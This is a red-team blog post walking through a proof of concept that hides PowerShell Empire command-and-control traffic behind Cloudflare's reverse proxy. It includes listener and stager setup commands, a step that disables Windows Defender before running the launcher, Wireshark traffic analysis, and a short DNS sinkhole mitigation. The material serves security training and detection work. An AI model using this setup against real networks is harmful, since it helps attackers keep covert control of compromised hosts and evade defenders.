PoC: Using Cloudflare as an HTTP C2 with Powershell Empire

For a red teamer, one of the biggest challenges is utilizing a command-and-control(C2) server without being discovered and blocked. This is because the detected traffic is not coming from a trusted source. One way around this is to use CloudFlare’s free HTTP reverse proxy service as your C2. By pivoting all HTTP traffic through these proxies, it becomes much harder for a network defender to detect malicious intent.

DISCLAIMER

The information contained in this blog post is for educational purposes ONLY! HoldMyBeerSecurity.com/HoldMyBeer.xyz and its authors DO NOT hold any responsibility for any misuse or damage of the information provided in blog posts, discussions, activities, or exercises. 

DISCLAIMER

CloudFlare(CF) DNS records

Typical A record

Typical A records point a DNS resource at an IP address. For example, an A record for “google.com” points at the IP address of “216.58.217.110”. 

CloudFlare A record with proxy capabilities

Within CloudFlare, you create an A record and point at an IP address. For example, “holdmybeersecurity.com” is pointed at the IP address of “198.211.100.42” with proxy option on (orange cloud). However, if we use the MxToolBox tool above to lookup my IP address, we are returned with “104.27.150.211” as the IP address. As a side note, CloudFlare MUST be your authoritative DNS provider for your domain for this to happen.

 

Internally, I ASSUME CloudFlare is setting the A record to one of its externally accessible IP addresses. When it receives an HTTP request for your domain on one of its proxies, it does a lookup for the actual IP address. As you can see below, a client is making an HTTP request to the server on the right, however, the request goes through CloudFlare’s NGINX reverse proxy and then to the requested server.

Install/Setup Powershell Empire with CloudFlare

CloudFlare DNS records

I own the following domain “malwarelove.xyz” and its authoritative DNS servers are set to CloudFlare. I created two A records, one record uses the proxy and one does not. “malwarelove.xyz” is an A record without theCloudFlare proxy and is pointed at the IP address of “129.21.110.78”. “proxy.malwarelove.xyz” is an A record with the CloudFlare proxy and is pointed at the IP address of “129.21.110.78”.

We can confirm these records with the MxToolBox

 

Download Empire

  1. cd /opt
  2. pip install pip==18.1
    1. Newer version of pip break the install :/
  3. git clone https://github.com/EmpireProject/Empire
  4. cd Empire
  5. sudo ./setup/install.sh
  6. ./empire

Create Empire listeners

  1. listeners
  2. uselistener http
    1. set Name non-proxy-c2
    2. set Host http://malwarelove.xyz:80
    3. set Port 80
    4. execute
  3.  back
  4. uselistener http
    1. set Name proxy-c2
    2. set Host https://proxy.malwarelove.xyz
    3. set Port 443
    4. set CertPath data/
    5. execute
  5.  back
  6. listeners

Generate stager for non-proxy-c2(HTTP)

  1. usestager multi/launcher non-proxy-c2
  2. execute
  3. Copy the output

Detonate the stager

  1. Boot up a Windows 10 VM
  2. Download and install Wireshark
  3. Start a Wireshark capture
  4. Disable Windows Defender
  5. Open a Powershell command prompt
  6. Paste the output above

Wireshark analysis

First, you may notice a DNS query for “malwarelove.xyz” with a response of “129.21.110.78”.

Second, you may notice a TCP handshake(Figure 1: TCP handshake) happening with a source IP address of “172.16.66.129” and a destination IP address “129.21.110.78”. This is the actual IP address of our C2 server.

Third, you may notice an HTTP GET request for “http://malwarelove.xyz/news.php” for the IP address “129.21.110.78”.

Lastly, If you open a browser and browse to “http://malwarelove.xyz” you will be prompted with an IIS webpage. Additionally, this website is not encrypted and you can verify that in the top lefthand corner – No green lock/Not secure.

Kill non-proxy-c2 agent

  1. agents
  2. kill <agent ID>

Generate stager for proxy-c2(HTTPS)

  1. usestager multi/launcher proxy-c2
  2. execute
  3. Copy the output

Detonate the stager

  1. Open a Powershell command prompt
  2. Paste the output above

Wireshark analysis

First, you should notice a DNS query for “proxy.malwarelove.xyz” with a response of “104.27.150.87”.

Second, you may notice a TCP handshake(Figure 1: TCP handshake) happening with a source IP address of “172.16.66.129” and a destination IP address “”. This is the IP address of the CloudFlare reverse proxy and NOT our C2 server.

Third, you may notice a TLS “Client Hello”, “Client Key Exchange”, and “Application Data”. This is the creation of a working TLS encrypted tunnel encapsulating all of our HTTP traffic. We can no longer see the HTTP GET request because it is within the TLS encrypted tunnel. We can confirm this by looking at the “Server name” header in the TLS header which should be defined as “proxy.malwarelove.xyz”.

Finally, If you open a browser and browse to “https://proxy.malwarelove.xyz”, you will be prompted with IIS webpage but notice the green lock in top left-hand corner. If you select the lock and inspect the cert, you will see a signed cert for CloudFlare, but it is being used for your traffic as well.

Mitigation

One mitigation against this attack is sink holing the malicious domain. “DNS sink holing is a mechanism aimed at protecting users by intercepting DNS request attempting to connect to known malicious or unwanted domains and returning a false, or rather controlled, IP address”.

For example, if you detect malicious activity for the following FQDN: “proxy.malwarelove.xyz”, you can create a zone on BIND for “malwarelove.xyz” on your local DNS server to point to 192.168.1.1. Any time a user in your environment requests that domain/FQDN, your server will respond with “192.168.1.1” as the IP address.

Take away

Attackers are getting smarter everyday and they are using TRUSTED technologies to mask their activities. CloudFlare has the advantage of being a platform that is used widely in our industry. Additionally, analysis of malicious activity becomes harder because the IP address/platform for the C2 communication may be considered trusted. I have provided additional resources below on how to setup a sinkhole:

Here are some more resources on detecting C2 channels:

DISCLAIMER

The information contained in this blog post is for educational purposes ONLY! HoldMyBeerSecurity.com/HoldMyBeer.xyz and its authors DO NOT hold any responsibility for any misuse or damage of the information provided in blog posts, discussions, activities, or exercises. 

DISCLAIMER

Resources/Sources

One thought on “PoC: Using Cloudflare as an HTTP C2 with Powershell Empire

Leave a Reply

Your email address will not be published. Required fields are marked *